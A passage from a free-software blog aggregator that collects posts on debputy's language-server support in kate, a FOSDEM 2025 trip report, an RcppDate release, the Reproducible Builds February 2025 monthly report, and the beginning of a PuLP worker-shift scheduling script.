  4. The LSP server looks at the provided range and is expected to return the relevant quickfixes here.
This flow is really annoying from an LSP server writer's point of view. When you do the diagnostics (in step 1), you tend to already know what the possible quickfixes would be. The LSP spec authors realized this at some point, so there are two features the editor can provide to simplify this.
  1. In the editor's request for code actions, the editor is expected to provide the diagnostics that it received from the server. Side note: I cannot quite tell from the spec whether this is optional or required.
  2. The editor can provide support for remembering a data member in each diagnostic. The server can then store arbitrary information in that member, which it will see again in the code actions request. Again, provided that the editor supports this optional feature.
All the quickfix logic in debputy so far has hinged on both of these features. As life would have it, kate provides neither of them. This meant I had to teach debputy to keep track of its diagnostics on its own. The plus side is that this makes it easier to support "pull diagnostics" down the line, since that requires a similar feature. Additionally, it also means that quickfixes are now available in more editors. For consistency, debputy's own logic is now always used rather than relying on the editor support when present. The downside is that I had to spend hours coming up with and debugging a way to find the diagnostics that overlap with the range provided by the editor. The most difficult part was keeping the logic straight and getting the runes correct for it.
Making the quickfixes actually work

With all of that, kate would show the quickfixes for diagnostics from debputy and you could use them too. However, they would always apply twice, with a suboptimal outcome as a result. The LSP spec has multiple ways of defining what needs to be changed in response to activating a code action. In debputy, all edits are currently done via the WorkspaceEdit type. It has two ways of defining the changes: either via changes or via documentChanges, with documentChanges being the preferred one if both parties support it. I originally read that as being allowed to provide both, with the editor picking the one it preferred. However, after seeing kate blindly use both when they are present, I reviewed the spec and it does say "The edit should either provide changes or documentChanges", so I think that one is on me. None of the changes in debputy currently require documentChanges, so I went with just using changes for now despite it not being preferred. I cannot figure out the logic for whether an editor supports documentChanges. As I read the notes for this part of the spec, my understanding is that kate does not announce its support for documentChanges but clearly uses them when present. Therefore, I decided to keep it simple for now until I have time to dig deeper.
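For illustration, the changes form of a WorkspaceEdit is JSON along these lines (the file path, range and new text are made up for the example):
{
  "changes": {
    "file:///path/to/debian/control": [
      {
        "range": {
          "start": { "line": 6, "character": 0 },
          "end": { "line": 6, "character": 7 }
        },
        "newText": "Priority"
      }
    ]
  }
}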
Remaining limitations with kate

There is one remaining limitation with kate that I have not yet solved. The kate program uses KSyntaxHighlighting for its language detection, which in turn is the basis for which LSP server is assigned to a given document. This engine does not seem to support detection logic as complex as I had hoped. Concretely, it either matches on an extension / a basename (same field for both cases) or a mime type. Combined with our habit in Debian of using extension-less files like debian/control vs. debian/tests/control, or debian/rules, or debian/upstream/metadata, this makes things awkward at best. Concretely, the syntax engine cannot tell debian/control from debian/tests/control as they use the same basename. Fortunately, the syntax is close enough to work for both, and debputy is set to use filename-based lookups, so this case works well enough. However, for debian/rules and debian/upstream/metadata, my understanding is that if I assign these in the syntax engine as Debian files, the rules will also trigger for any file named foo.rules or bar.metadata. That seems a bit too broad for me, so I have opted out of that for now. The downside is that these files will not work out of the box with kate for now. The current LSP configuration in kate does not recognize makefiles or YAML either. Ideally, we would assign custom languages for the affected Debian files, so we do not steal the ID from other language servers. Notably, kate has a built-in language server for YAML, and debputy does nothing for a generic YAML document. However, adding YAML as a supported language for debputy would cause conflicts and regressions for users that are already happy with their generic YAML language server in kate. So there is certainly still work to be done. If you are good with KSyntaxHighlighting and know how to solve some of this, I hope you will help me out.
Changes unrelated to kate

While I was working on debputy, I also added some other features that I want to mention.
  1. The debputy lint command will now show related context to diagnostic in its terminal report when such information is available and is from the same file as the diagnostic itself (cross file cases are rendered without related information). The related information is typically used to highlight a source of a conflict. As an example, if you use the same field twice in a stanza of debian/control, then debputy will add a diagnostic to the second occurrence. The related information for that diagnostic would provide the position of the first occurrence. This should make it easier to find the source of the conflict in the cases where debputy provides it. Let me know if you are missing it for certain diagnostics.

  2. The diagnostics analysis of debian/control will now identify and flag simple duplicated relations (complex ones like OR relations are ignored for now). Thanks to Matthias Geiger for suggesting the feature and Otto Kekäläinen for reporting a false positive that is now fixed.

Closing

I am glad I tested with kate to weed out most of these issues in time before the freeze. The Debian freeze will start within a week from now. Since debputy is a part of the toolchain packages, it will be frozen from then on except for important bug fixes.

7 March 2025

Paulo Henrique de Lima Santana: Bits from FOSDEM 2025

This year I was at FOSDEM 2025, the fifth edition in a row that I have attended in person (the previous ones were in 2019, 2020, 2023 and 2024). The event took place on February 1st and 2nd, as always at the ULB campus in Brussels. We arrived on Friday at lunchtime and went straight to the hotel to drop off our bags. This time we stayed at the Ibis in the city center, very close to the hustle and bustle. The price was good and the location was really convenient for going out in the city center and coming back late at night. We found a Japanese restaurant near the hotel and it was definitely worth having lunch there because of the all-you-can-eat price. After taking a nap, we went out for a walk. Since January 31st is the last day of the winter sales in the city, the streets in the city center were crowded, there were lots of people in the stores, and the prices were discounted. We concluded that if we have the opportunity to go to Brussels again at this time of year, it would be better to wait and buy clothes for cold weather there.
Fosdem 2025
Unlike in 2023 and 2024, the FOSDEM organization did not approve my request for the Translations DevRoom, so my goal was to participate in the event and help out at the Debian booth. And as I always do, I volunteered to operate the broadcast camera in the main auditorium on both days, for two hours each. The Debian booth:
Fosdem 2025
Me in the auditorium helping with the broadcast:
Fosdem 2025
Two weeks before the event, the organization put out a call for interested people to request a room for their community's BoF (Birds of a Feather), and I requested a room for Debian and it was approved :-) It was great to see that people were really interested in participating in the BoF and the room was packed! As the host of the discussions, I tried to leave the space open for anyone who wanted to talk about any subject related to Debian. We started with a talk from the MiniDebConf25 organizers, which will be taking place this year in France. Then other topics followed, with people talking, asking and answering questions, etc. It was worth organizing this BoF. Who knows, maybe the idea will live on in 2026.
Fosdem 2025
Carlos (a.k.a. Charles), Athos, Maíra and Melissa talked at Fosdem, and Kanashiro was one of the organizers of the Distributions DevRoom
Fosdem 2025
During the two days of the event, it didn't rain or get too cold. The days were sunny (and people celebrated the weather in Brussels). But I have to admit that it would have been nice to see snow like I did in 2019. Unlike last year, this time I felt more motivated to stay at the event the whole time. I would like to give my special thanks to Andreas Tille, the current Debian Leader, who approved my request for flight tickets so that I could join FOSDEM 2025. As always, this help was essential in making my trip to Brussels possible. And once again Jandira was with me on this adventure. On Monday we went for a walk around Brussels and we also traveled to visit Bruges again. The visit to this city is really worth it because walking through the historic streets is like going back in time. This time we even took a boat trip through the canals, which was really cool.
Fosdem 2025

Fosdem 2025

6 March 2025

Dirk Eddelbuettel: RcppDate 0.0.5: Address Minor Compiler Nag

RcppDate wraps the featureful date library written by Howard Hinnant for use with R. This header-only modern C++ library has been in pretty widespread use for a while now, and adds to C++11/C++14/C++17 what is (with minor modifications) the date library in C++20. RcppDate adds no extra R or C++ code and can therefore be a zero-cost dependency for any other project; yet a number of other projects decided to re-vendor it, resulting in less-efficient duplication. Oh well. C'est la vie. This release syncs with the (already mostly included) upstream release 3.0.3, and also addresses a fresh (and mildly esoteric) nag from clang++-20. One upstream PR already addressed this in the files tickled by some CRAN packages; I followed this up with another upstream PR addressing this in a few more occurrences.

Changes in version 0.0.5 (2025-03-06)
  • Updated to upstream version 3.0.3
  • Updated 'whitespace in literal' issue upsetting clang++-20; this is also fixed upstream via two PRs

Courtesy of my CRANberries, there is also a diffstat report for the most recent release. More information is available at the repository or the package page.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can sponsor me at GitHub.

5 March 2025

Reproducible Builds: Reproducible Builds in February 2025

Welcome to the second report of 2025 from the Reproducible Builds project. Our monthly reports outline what we've been up to over the past month, and highlight items of news from elsewhere in the increasingly important area of software supply-chain security. As usual, however, if you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. Table of contents:
  1. Reproducible Builds at FOSDEM 2025
  2. Reproducible Builds at PyCascades 2025
  3. Does Functional Package Management Enable Reproducible Builds at Scale?
  4. reproduce.debian.net updates
  5. Upstream patches
  6. Distribution work
  7. diffoscope & strip-nondeterminism
  8. Website updates
  9. Reproducibility testing framework

Reproducible Builds at FOSDEM 2025

Similar to last year's event, there was considerable activity regarding Reproducible Builds at FOSDEM 2025, held on 1st and 2nd February this year in Brussels, Belgium. We count at least four talks related to reproducible builds. (You can also read our news report from last year's event, in which Holger Levsen presented in the main track.)
Jelle van der Waa, Holger Levsen and kpcyrd presented in the Distributions track on A Tale of several distros joining forces for a common goal. In this talk, three developers from two different Linux distributions (Arch Linux and Debian) discuss this goal, which is, of course, reproducible builds. The presenters discuss both what is shared and what differs between the two efforts, touching on the history and future challenges alike. The slides of this talk are available to view, as is the full video (30m02s). The talk was also discussed on Hacker News.
Zbigniew Jędrzejewski-Szmek presented in the ever-popular Python track on Rewriting .pyc files for fun and reproducibility, i.e. the bytecode files generated by Python in order to speed up module imports: It's been known for a while that those are not reproducible: on different architectures, the bytecode for exactly the same sources ends up slightly different. The slides of this talk are available, as is the full video (28m32s).
In the Nix and NixOS track, Julien Malka presented on the Saturday, asking How reproducible is NixOS: We know that the NixOS ISO image is very close to being perfectly reproducible thanks to reproducible.nixos.org, but there doesn't exist any monitoring of Nixpkgs as a whole. In this talk I'll present the findings of a project that evaluated the reproducibility of Nixpkgs as a whole by mass rebuilding packages from revisions between 2017 and 2023 and comparing the results with the NixOS cache. Unfortunately, no video of the talk is available, but there is a blog post and article on the results.
Lastly, Simon Tournier presented in the Open Research track on the confluence of GNU Guix and Software Heritage: Source Code Archiving to the Rescue of Reproducible Deployment. Simon's talk describes the design and implementation we came up with and reports on the archival coverage for package source code with data collected over five years. It opens onto some remaining challenges toward better open and reproducible research. The slides for the talk are available, as is the full video (23m17s).

Reproducible Builds at PyCascades 2025

Vagrant Cascadian presented at this year's PyCascades conference, which was held on February 8th and 9th in Portland, OR, USA. PyCascades is a regional instance of PyCon held in the Pacific Northwest. Vagrant's talk, entitled Re-Py-Ducible Builds, caught the audience's attention with the following abstract:
Crank your Python best practices up to 11 with Reproducible Builds! This talk will explore Reproducible Builds by highlighting issues identified in Python projects, from the simple to the seemingly inscrutable. Reproducible Builds is basically the crazy idea that when you build something, and you build it again, you get the exact same thing; or, even more important, if someone else builds it, they get the exact same thing too.
More info is available on the talk's page.

Does Functional Package Management Enable Reproducible Builds at Scale?

On our mailing list last month, Julien Malka, Stefano Zacchiroli and Théo Zimmermann of Télécom Paris' in-house research laboratory, the Information Processing and Communications Laboratory (LTCI), announced that they had published an article asking the question: Does Functional Package Management Enable Reproducible Builds at Scale? (PDF). This month, however, Ludovic Courtès followed up on the original announcement on our mailing list, mentioning, amongst other things, the Guix Data Service and how it shows the reproducibility of GNU Guix over time, as described in a GNU Guix blog post back in March 2024.

reproduce.debian.net updates

The last few months have seen the introduction of reproduce.debian.net. Announced first at the recent Debian MiniDebConf in Toulouse, reproduce.debian.net is an instance of rebuilderd operated by the Reproducible Builds project. Powering this work is rebuilderd, our server which monitors the official package repositories of Linux distributions and attempts to reproduce the observed results there. This month, Holger Levsen:
  • Split packages that are not specific to any architecture away from amd64.reproducible.debian.net service into a new all.reproducible.debian.net page.
  • Increased the number of riscv64 nodes to a total of 4, and added a new amd64 node thanks to IONOS, our sponsor of now 10 years.
  • Discovered an issue in the Debian build service where some new incoming build-dependencies do not end up historically archived.
  • Uploaded the devscripts package, incorporating changes from Jochen Sprickerhof to the debrebuild script, specifically to fix the handling of the Rules-Requires-Root header in Debian source packages.
  • Uploaded a number of Rust dependencies of rebuilderd (rust-libbz2-rs-sys, rust-actix-web, rust-actix-server, rust-actix-http, rust-actix-web-codegen and rust-time-tz) after they were prepared by kpcyrd.
Jochen Sprickerhof also updated the sbuild package to:
  • Obey requests from the user/developer for a different temporary directory.
  • Use the root/superuser for some values of Rules-Requires-Root.
  • Don t pass --root-owner-group to old versions of dpkg.
and additionally requested that many Debian packages be rebuilt by the build servers in order to work around bugs found on reproduce.debian.net. [ ][ ][ ]
Lastly, kpcyrd has also worked towards getting rebuilderd packaged in NixOS, and Jelle van der Waa picked up the existing pull request for Fedora support within rebuilderd and made it work with the existing Koji rebuilderd script. The server is being packaged for Fedora in an unofficial copr repository, and will be in the official repositories after all the dependencies are packaged.

Upstream patches The Reproducible Builds project detects, dissects and attempts to fix as many currently-unreproducible packages as possible. We endeavour to send all of our patches upstream where appropriate. This month, we wrote a large number of such patches, including:

Distribution work There has been the usual work in various distributions this month, such as: In Debian, 17 reviews of Debian packages were added, 6 were updated and 8 were removed this month, adding to our knowledge about identified issues.
Fedora developers Davide Cavalca and Zbigniew Jędrzejewski-Szmek gave a talk on Reproducible Builds in Fedora (PDF), touching on SRPM-specific issues as well as the current status and future plans.
Thanks to an investment from the Sovereign Tech Agency, the FreeBSD project's work on unprivileged and reproducible builds continued this month. Notable fixes include:
The Yocto Project has been struggling to upgrade to the latest Go and Rust releases due to reproducibility problems in the newer versions. Hongxu Jia tracked down the issue with Go which meant that the project could upgrade from the 1.22 series to 1.24, with the fix being submitted upstream for review (see above). For Rust, however, the project was significantly behind, but has made recent progress after finally identifying the blocking reproducibility issues. At time of writing, the project is at Rust version 1.82, with patches under review for 1.83 and 1.84 and fixes being discussed with the Rust developers. The project hopes to improve the tests for reproducibility in the Rust project itself in order to try and avoid future regressions. Yocto continues to maintain its ability to binary reproduce all of the recipes in OpenEmbedded-Core, regardless of the build host distribution or the current build path.
Finally, Douglas DeMaio published an article on the openSUSE blog announcing that the Reproducible-openSUSE (RBOS) Project Hits [Significant] Milestone. In particular:
The Reproducible-openSUSE (RBOS) project, which is a proof-of-concept fork of openSUSE, has reached a significant milestone after demonstrating that a usable Linux distribution can be built with 100% bit-identical packages.
This news was also announced on our mailing list by Bernhard M. Wiedemann, who also published another report for openSUSE as well.

diffoscope & strip-nondeterminism diffoscope is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues. This month, Chris Lamb made the following changes, including preparing and uploading versions 288 and 289 to Debian:
  • Add asar to DIFFOSCOPE_FAIL_TESTS_ON_MISSING_TOOLS in order to address Debian bug #1095057. [ ]
  • Catch a CalledProcessError when calling html2text. [ ]
  • Update the minimal Black version. [ ]
Additionally, Vagrant Cascadian updated diffoscope in GNU Guix to versions 287 [ ][ ] and 288 [ ][ ], and submitted a patch to update to 289 [ ]. Vagrant also fixed an issue that was breaking reprotest on Guix [ ][ ]. strip-nondeterminism is our sister tool to remove specific non-deterministic results from a completed build. This month version 1.14.1-2 was uploaded to Debian unstable by Holger Levsen.

Website updates There were a large number of improvements made to our website this month, including:

Reproducibility testing framework The Reproducible Builds project operates a comprehensive testing framework running primarily at tests.reproducible-builds.org in order to check packages and other artifacts for reproducibility. In January, a number of changes were made by Holger Levsen, including:
  • reproduce.debian.net-related:
    • Add a helper script to manually schedule packages. [ ][ ][ ][ ][ ]
    • Fix a link in the website footer. [ ]
    • Strip the emojis from package names on the manual rebuilder in order to ease copy-and-paste. [ ]
    • On the various statistics pages, provide the number of affected source packages [ ][ ] as well as provide various totals [ ][ ].
    • Fix graph labels for the various architectures [ ][ ] and make them clickable too [ ][ ][ ].
    • Break the displayed HTML into blocks of 256 packages in order to address rendering issues. [ ][ ]
    • Add monitoring jobs for riscv64 architecture nodes and integrate them elsewhere in our infrastructure. [ ][ ]
    • Add riscv64 architecture nodes. [ ][ ][ ][ ][ ]
    • Update much of the documentation. [ ][ ][ ]
    • Make a number of improvements to the layout and style. [ ][ ][ ][ ][ ][ ][ ]
    • Remove direct links to JSON and database backups. [ ]
    • Drop a Blues Brothers reference from the frontpage. [ ]
  • Debian-related:
    • Deal with /boot/vmlinuz* being called vmlinux* on the riscv64 architecture. [ ]
    • Add a new ionos17 node. [ ][ ][ ][ ][ ]
    • Install debian-repro-status on all Debian trixie and unstable jobs. [ ]
  • FreeBSD-related:
    • Switch to running the latest branch of FreeBSD. [ ]
  • Misc:
    • Fix /etc/cron.d and /etc/logrotate.d permissions for Jenkins nodes. [ ]
    • Add support for riscv64 architecture nodes. [ ][ ]
    • Grant Jochen Sprickerhof access to the o4 node. [ ]
    • Disable the janitor-setup-worker. [ ][ ]
In addition:
  • kpcyrd fixed the /all/api/ API endpoints on reproduce.debian.net by altering the nginx configuration. [ ]
  • James Addison updated reproduce.debian.net to display the so-called bad reasons hyperlink inline [ ] and merged the Categorized issues links into the Reproduced builds column [ ].
  • Jochen Sprickerhof also made some reproduce.debian.net-related changes, adding support for detecting a bug in the mmdebstrap package [ ] as well as updating some documentation [ ].
  • Roland Clobus continued their work on reproducible live images for Debian, making changes related to new clustering of jobs in openQA. [ ]
And finally, both Holger Levsen [ ][ ][ ] and Vagrant Cascadian performed significant node maintenance. [ ][ ][ ][ ][ ]
If you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. Alternatively, you can get in touch with us via:

Dima Kogan: Shop scheduling with PuLP

I recently used the PuLP modeler to solve a work scheduling problem: assigning workers to shifts. Here are my notes about doing that. This is a common use case, but it isn't explicitly covered in the case studies in the PuLP documentation. Here's the problem: the tool is supposed to allocate workers to shifts, trying to cover all the shifts, give everybody work, and match their preferences. I implemented the tool:
#!/usr/bin/python3
import sys
import os
import re
def report_solution_to_console(vars):
    for w in days_of_week:
        annotation = ''
        if human_annotate is not None:
            for s in shifts.keys():
                m = re.match(rf'{w} - ', s)
                if not m: continue
                if vars[human_annotate][s].value():
                    annotation = f" ({human_annotate} SCHEDULED)"
                    break
            if not len(annotation):
                annotation = f" ({human_annotate} OFF)"
        print(f"{w}{annotation}")
        for s in shifts.keys():
            m = re.match(rf'{w} - ', s)
            if not m: continue
            annotation = ''
            if human_annotate is not None:
                annotation = f" ({human_annotate} {shifts[s][human_annotate]})"
            print(f"    ---- {s[m.end():]}{annotation}")
            for h in humans:
                if vars[h][s].value():
                    print(f"          {h} ({shifts[s][h]})")
def report_solution_summary_to_console(vars):
    print("\nSUMMARY")
    for h in humans:
        print(f"-- {h}")
        print(f"   benefit: {benefits[h].value():.3f}")
        counts = dict()
        for a in availabilities:
            counts[a] = 0
        for s in shifts.keys():
            if vars[h][s].value():
                counts[shifts[s][h]] += 1
        for a in availabilities:
            print(f"    {counts[a]} {a}")
human_annotate = None
days_of_week = ('SUNDAY',
                'MONDAY',
                'TUESDAY',
                'WEDNESDAY',
                'THURSDAY',
                'FRIDAY',
                'SATURDAY')
humans = ['ALICE', 'BOB',
          'CAROL', 'DAVID', 'EVE', 'FRANK', 'GRACE', 'HEIDI', 'IVAN', 'JUDY']
shifts = {'SUNDAY - SANDING 9:00 AM - 4:00 PM': {
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'PREFERRED',
           'DAVID': 'PREFERRED',
           'EVE':   'PREFERRED',
           'FRANK': 'PREFERRED',
           'GRACE': 'DISFAVORED',
           'HEIDI': 'DISFAVORED',
           'IVAN':  'PREFERRED',
           'JUDY':  'NEUTRAL'},
          'WEDNESDAY - SAWING 7:30 AM - 2:30 PM': {
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'PREFERRED',
           'DAVID': 'PREFERRED',
           'FRANK': 'PREFERRED',
           'GRACE': 'NEUTRAL',
           'HEIDI': 'DISFAVORED',
           'IVAN':  'PREFERRED',
           'EVE':   'REFUSED',
           'JUDY':  'REFUSED'},
          'THURSDAY - SANDING 9:00 AM - 4:00 PM': {
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'PREFERRED',
           'DAVID': 'PREFERRED',
           'EVE':   'PREFERRED',
           'FRANK': 'PREFERRED',
           'GRACE': 'PREFERRED',
           'HEIDI': 'DISFAVORED',
           'IVAN':  'PREFERRED',
           'JUDY':  'PREFERRED'},
          'SATURDAY - SAWING 7:30 AM - 2:30 PM': {
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'PREFERRED',
           'DAVID': 'PREFERRED',
           'FRANK': 'PREFERRED',
           'HEIDI': 'DISFAVORED',
           'IVAN':  'PREFERRED',
           'EVE':   'REFUSED',
           'JUDY':  'REFUSED',
           'GRACE': 'REFUSED'},
          'SUNDAY - SAWING 9:00 AM - 4:00 PM': {
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'PREFERRED',
           'DAVID': 'PREFERRED',
           'EVE':   'PREFERRED',
           'FRANK': 'PREFERRED',
           'GRACE': 'DISFAVORED',
           'IVAN':  'PREFERRED',
           'JUDY':  'PREFERRED',
           'HEIDI': 'REFUSED'},
          'MONDAY - SAWING 9:00 AM - 4:00 PM': {
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'PREFERRED',
           'DAVID': 'PREFERRED',
           'EVE':   'PREFERRED',
           'FRANK': 'PREFERRED',
           'GRACE': 'PREFERRED',
           'IVAN':  'PREFERRED',
           'JUDY':  'PREFERRED',
           'HEIDI': 'REFUSED'},
          'TUESDAY - SAWING 9:00 AM - 4:00 PM': {
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'PREFERRED',
           'DAVID': 'PREFERRED',
           'EVE':   'PREFERRED',
           'FRANK': 'PREFERRED',
           'GRACE': 'NEUTRAL',
           'IVAN':  'PREFERRED',
           'JUDY':  'PREFERRED',
           'HEIDI': 'REFUSED'},
          'WEDNESDAY - PAINTING 7:30 AM - 2:30 PM': {
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'PREFERRED',
           'FRANK': 'PREFERRED',
           'GRACE': 'NEUTRAL',
           'HEIDI': 'DISFAVORED',
           'IVAN':  'PREFERRED',
           'EVE':   'REFUSED',
           'JUDY':  'REFUSED',
           'DAVID': 'REFUSED'},
          'THURSDAY - SAWING 9:00 AM - 4:00 PM': {
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'PREFERRED',
           'DAVID': 'PREFERRED',
           'EVE':   'PREFERRED',
           'FRANK': 'PREFERRED',
           'GRACE': 'PREFERRED',
           'IVAN':  'PREFERRED',
           'JUDY':  'PREFERRED',
           'HEIDI': 'REFUSED'},
          'FRIDAY - SAWING 9:00 AM - 4:00 PM': {
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'PREFERRED',
           'DAVID': 'PREFERRED',
           'EVE':   'PREFERRED',
           'FRANK': 'PREFERRED',
           'GRACE': 'PREFERRED',
           'IVAN':  'PREFERRED',
           'JUDY':  'DISFAVORED',
           'HEIDI': 'REFUSED'},
          'SATURDAY - PAINTING 7:30 AM - 2:30 PM': {
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'PREFERRED',
           'FRANK': 'PREFERRED',
           'HEIDI': 'DISFAVORED',
           'IVAN':  'PREFERRED',
           'EVE':   'REFUSED',
           'JUDY':  'REFUSED',
           'GRACE': 'REFUSED',
           'DAVID': 'REFUSED'},
          'SUNDAY - PAINTING 9:45 AM - 4:45 PM': {
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'NEUTRAL',
           'EVE':   'PREFERRED',
           'FRANK': 'PREFERRED',
           'GRACE': 'DISFAVORED',
           'IVAN':  'PREFERRED',
           'JUDY':  'PREFERRED',
           'HEIDI': 'REFUSED',
           'DAVID': 'REFUSED'},
          'MONDAY - PAINTING 9:45 AM - 4:45 PM': {
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'NEUTRAL',
           'EVE':   'PREFERRED',
           'FRANK': 'PREFERRED',
           'GRACE': 'PREFERRED',
           'IVAN':  'PREFERRED',
           'JUDY':  'NEUTRAL',
           'HEIDI': 'REFUSED',
           'DAVID': 'REFUSED'},
          'TUESDAY - PAINTING 9:45 AM - 4:45 PM': {
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'NEUTRAL',
           'EVE':   'PREFERRED',
           'FRANK': 'PREFERRED',
           'GRACE': 'NEUTRAL',
           'IVAN':  'PREFERRED',
           'JUDY':  'PREFERRED',
           'HEIDI': 'REFUSED',
           'DAVID': 'REFUSED'},
          'WEDNESDAY - SANDING 9:45 AM - 4:45 PM': {
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'NEUTRAL',
           'DAVID': 'PREFERRED',
           'FRANK': 'PREFERRED',
           'GRACE': 'NEUTRAL',
           'HEIDI': 'DISFAVORED',
           'IVAN':  'PREFERRED',
           'JUDY':  'NEUTRAL',
           'EVE':   'REFUSED'},
          'THURSDAY - PAINTING 9:45 AM - 4:45 PM': {
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'NEUTRAL',
           'EVE':   'PREFERRED',
           'FRANK': 'PREFERRED',
           'GRACE': 'NEUTRAL',
           'IVAN':  'PREFERRED',
           'JUDY':  'PREFERRED',
           'HEIDI': 'REFUSED',
           'DAVID': 'REFUSED'},
          'FRIDAY - PAINTING 9:45 AM - 4:45 PM': {
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'NEUTRAL',
           'EVE':   'PREFERRED',
           'FRANK': 'PREFERRED',
           'GRACE': 'PREFERRED',
           'IVAN':  'PREFERRED',
           'JUDY':  'DISFAVORED',
           'HEIDI': 'REFUSED',
           'DAVID': 'REFUSED'},
          'SATURDAY - SANDING 9:45 AM - 4:45 PM': {
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'NEUTRAL',
           'DAVID': 'PREFERRED',
           'FRANK': 'PREFERRED',
           'HEIDI': 'DISFAVORED',
           'IVAN':  'PREFERRED',
           'EVE':   'REFUSED',
           'JUDY':  'REFUSED',
           'GRACE': 'REFUSED'},
          'SUNDAY - PAINTING 11:00 AM - 6:00 PM': {
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'NEUTRAL',
           'EVE':   'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'GRACE': 'NEUTRAL',
           'HEIDI': 'PREFERRED',
           'IVAN':  'NEUTRAL',
           'JUDY':  'NEUTRAL',
           'DAVID': 'REFUSED'},
          'MONDAY - PAINTING 12:00 PM - 7:00 PM': {
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'NEUTRAL',
           'EVE':   'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'GRACE': 'PREFERRED',
           'IVAN':  'NEUTRAL',
           'JUDY':  'NEUTRAL',
           'HEIDI': 'REFUSED',
           'DAVID': 'REFUSED'},
          'TUESDAY - PAINTING 12:00 PM - 7:00 PM': {
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'NEUTRAL',
           'EVE':   'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'GRACE': 'NEUTRAL',
           'IVAN':  'NEUTRAL',
           'HEIDI': 'REFUSED',
           'JUDY':  'REFUSED',
           'DAVID': 'REFUSED'},
          'WEDNESDAY - PAINTING 12:00 PM - 7:00 PM': {
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'NEUTRAL',
           'FRANK': 'NEUTRAL',
           'GRACE': 'NEUTRAL',
           'IVAN':  'NEUTRAL',
           'JUDY':  'PREFERRED',
           'EVE':   'REFUSED',
           'HEIDI': 'REFUSED',
           'DAVID': 'REFUSED'},
          'THURSDAY - PAINTING 12:00 PM - 7:00 PM': {
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'NEUTRAL',
           'EVE':   'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'GRACE': 'NEUTRAL',
           'IVAN':  'NEUTRAL',
           'JUDY':  'PREFERRED',
           'HEIDI': 'REFUSED',
           'DAVID': 'REFUSED'},
          'FRIDAY - PAINTING 12:00 PM - 7:00 PM': {
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'NEUTRAL',
           'EVE':   'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'GRACE': 'NEUTRAL',
           'IVAN':  'NEUTRAL',
           'JUDY':  'DISFAVORED',
           'HEIDI': 'REFUSED',
           'DAVID': 'REFUSED'},
          'SATURDAY - PAINTING 12:00 PM - 7:00 PM': {
           'ALICE': 'NEUTRAL',
           'BOB':   'NEUTRAL',
           'CAROL': 'NEUTRAL',
           'FRANK': 'NEUTRAL',
           'IVAN':  'NEUTRAL',
           'JUDY':  'DISFAVORED',
           'EVE':   'REFUSED',
           'HEIDI': 'REFUSED',
           'GRACE': 'REFUSED',
           'DAVID': 'REFUSED'},
          'SUNDAY - SAWING 12:00 PM - 7:00 PM': {
           'ALICE': 'PREFERRED',
           'BOB':   'PREFERRED',
           'CAROL': 'NEUTRAL',
           'EVE':   'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'GRACE': 'NEUTRAL',
           'IVAN':  'NEUTRAL',
           'JUDY':  'PREFERRED',
           'HEIDI': 'REFUSED',
           'DAVID': 'REFUSED'},
          'MONDAY - SAWING 2:00 PM - 9:00 PM': {
           'ALICE': 'PREFERRED',
           'BOB':   'PREFERRED',
           'CAROL': 'DISFAVORED',
           'EVE':   'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'GRACE': 'NEUTRAL',
           'IVAN':  'DISFAVORED',
           'JUDY':  'DISFAVORED',
           'HEIDI': 'REFUSED',
           'DAVID': 'REFUSED'},
          'TUESDAY - SAWING 2:00 PM - 9:00 PM': {
           'ALICE': 'PREFERRED',
           'BOB':   'PREFERRED',
           'CAROL': 'DISFAVORED',
           'EVE':   'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'GRACE': 'NEUTRAL',
           'IVAN':  'DISFAVORED',
           'HEIDI': 'REFUSED',
           'JUDY':  'REFUSED',
           'DAVID': 'REFUSED'},
          'WEDNESDAY - SAWING 2:00 PM - 9:00 PM': {
           'ALICE': 'PREFERRED',
           'BOB':   'PREFERRED',
           'CAROL': 'DISFAVORED',
           'FRANK': 'NEUTRAL',
           'GRACE': 'NEUTRAL',
           'IVAN':  'DISFAVORED',
           'JUDY':  'DISFAVORED',
           'EVE':   'REFUSED',
